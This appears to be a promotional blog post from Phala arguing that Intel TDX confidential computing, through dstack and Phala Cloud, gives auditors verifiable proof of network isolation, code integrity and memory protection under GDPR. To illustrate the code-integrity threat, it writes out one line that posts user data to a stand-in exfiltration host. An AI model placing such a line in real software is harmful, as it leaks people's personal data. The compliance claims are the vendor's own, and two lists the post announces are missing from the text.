When GDPR meets LLMs: why TEE-based confidential computing is becoming the default answer for AI compliance
A Scene That's Playing Out Right Now
A European insurance company wants to use an LLM to process customer claims. The claims contain names, medical records, bank details — all protected under GDPR.
Their cloud provider offers what sounds like a perfect solution: deploy the model inside an encrypted VM. "Your data is safe," they say.
The legal team asks one question:
"Prove it."
Two words. The entire proposal collapses.
This isn't a technical problem. It's the question every AI product manager, security engineer, and compliance officer is facing in 2026: when AI handles sensitive data, "secure" has to mean verifiable — not just promised.
Three Questions Every AI Compliance Audit Will Ask
Any AI system that processes personal data needs to answer three questions at the compliance level:
These map to three technical domains: network isolation, code integrity, and memory protection. Miss any one, and the compliance evidence chain is incomplete.
The good news: TEE-based confidential computing can now provide verifiable answers to all three — not operational promises, but cryptographic proof.
How Phala Answers All Three
Phala offers two things: dstack, an open-source confidential computing platform, and Phala Cloud, a managed service built on top of it. Think of dstack as the open-source engine — it handles the hard problem of running AI workloads securely inside TEEs. Phala Cloud packages that capability as a turnkey service with monitoring, logging, ACLs, and compliance tooling.
Both are built on Intel TDX hardware-based trusted execution environments. Here's how they work together to answer the three compliance questions:
Proof #1: "This CVM cannot reach anything beyond the allowed list"
A cloud provider saying "we configured a firewall rule" means nothing to an auditor. What they need is proof that the rule is enforced and cannot be modified from inside the workload.
In the Phala Cloud architecture, inbound and outbound ACLs are enforced at the host OS layer — outside the CVM, outside the containers, in the operator-controlled layer that sits beyond the hardware isolation boundary. dstack, our open-source orchestrator, pushes these policies to every CVM. This means:
- No code inside the CVM can alter the ACL, even with root access
- Ingress and egress policies are enforced symmetrically, creating a complete network perimeter
- The policy hash is written into the TDX RTMR3 register, which means it becomes part of the remote attestation quote — any auditor with the quote can independently verify "this CVM's network restrictions match what was agreed to"
This is architecturally equivalent to GCP VPC Firewall or Azure NSG rules, but with one critical difference: the ACL policy is bound into the hardware attestation chain, not just sitting in a cloud console that only the provider can inspect.
Proof #2: "The code running inside this CVM does what the audit says it does"
This is the most important of the three proofs — and the one most organizations overlook.
A "secure" AI inference service that includes one extra line — requests.post("<https://exfil.example.com>", json=user_data) — renders every other security control meaningless. Network isolation can't catch what the app does through an authorized channel.
Phala's answer is a three-layer verification chain, with dstack's compose-hash at its center:
| Layer | What happens | Who can verify |
| Source audit | A third-party security team reviews the workload source code, confirming no malicious logic | The auditor |
| Reproducible build | The same source, built on any machine, produces an identical binary hash (compose-hash) | Anyone |
| Hardware attestation (RTMR3) | The compose-hash is written into TDX's RTMR3 register and included in every remote attestation quote | Any quote verifier |
Together, these answer a concrete compliance question:
"The code was audited → the built result matches the audited source → the running binary hasn't been replaced → all of this is independently verifiable via TDX remote attestation."
You don't need to trust Phala. You don't need to trust the cloud provider. You only need to trust Intel's hardware security guarantees and open-source code you can read yourself.
dstack is fully open source under the Apache 2.0 license. An auditor can clone the repo, reproduce the build, and verify the compose-hash independently. Phala Cloud's deployment pipeline uses the same open-source dstack code — what runs in production is what's in the public repository.
Proof #3: "This CVM's memory cannot be read from the outside"
This is the headline capability of TEE technology.
Intel TDX creates an encrypted memory region at the CPU level. The hypervisor, the host operating system, and even the cloud platform administrator cannot read data inside it. From the outside, it's an opaque encrypted block — a "black box" in the literal sense.
For GDPR Article 32 (security of processing) and the AI Act's requirements for high-risk systems, this matters because:
- "We implement appropriate technical measures to protect personal data" stops being corporate boilerplate and becomes a fact you can prove with a TDX Quote
- The data processor (Phala / your cloud provider) cannot access data subjects' information — even under a court order, they technically cannot produce it (because they cannot read it)
This is the principle of technical impossibility — a stronger legal position than "we promise not to look."
An Honest Admission: No Single Technology Is a Silver Bullet
As powerful as these three proofs are in combination, there is a reality we owe you:
No infrastructure-layer technology can 100% prevent data exfiltration.
Here's why: an audited AI workload, calling api.openai.com through an authorized channel to send an inference request, will transmit whatever the user typed — including any sensitive data in the prompt. No network firewall can inspect that, because at the application layer, it's a perfectly legitimate request.
This isn't a technology failure. It's the natural separation of security responsibilities:
Each layer solves a different problem. TEE confidential computing — and specifically what Phala Cloud and dstack provide today — solves Layer 1 and Layer 2. Layer 3 still requires organizational governance. Just as the world's best safe doesn't decide what you choose to put inside it.
The 2026 Compliance Landscape
A clear trend is unfolding across the enterprises we work with:
- Insurance, financial services, and healthcare AI projects are shifting from "we need faster inference" to "we need provable data protection"
- The EU AI Act + GDPR combination means compliance is no longer the legal department's side project — it's a product infrastructure requirement
- TEE confidential computing is moving from "security research lab experiment" to "standard configuration for enterprise AI deployment"
This isn't hype. It's what we observe every day in conversations with customers, auditors, and engineering teams.
Phala Cloud is purpose-built to serve this transition. dstack provides the open-source foundation that auditors can inspect; Phala Cloud delivers the operational surface — ACLs, monitoring, key management, and attestation verification — that teams need to go to production.
Trust, But Verify
In 1987, Ronald Reagan used a Russian proverb with Gorbachev: "Trust, but verify."
Nearly 40 years later, it's the best summary of what AI data compliance demands.
Your AI infrastructure provider says your data is secure — can they prove it?
TEE confidential computing gives you a technically verifiable answer. Not "trust us," but "here is a TDX Quote — you can verify it on your own machine, using open-source tooling, without depending on any third party's word."
That's what privacy-preserving compute means for AI compliance.
Phala provides TEE-based confidential computing infrastructure. dstack is the open-source orchestration platform (Apache 2.0). Phala Cloud is the managed enterprise service. Both are built on Intel TDX. Learn more at docs.phala.com or explore dstack on GitHub.
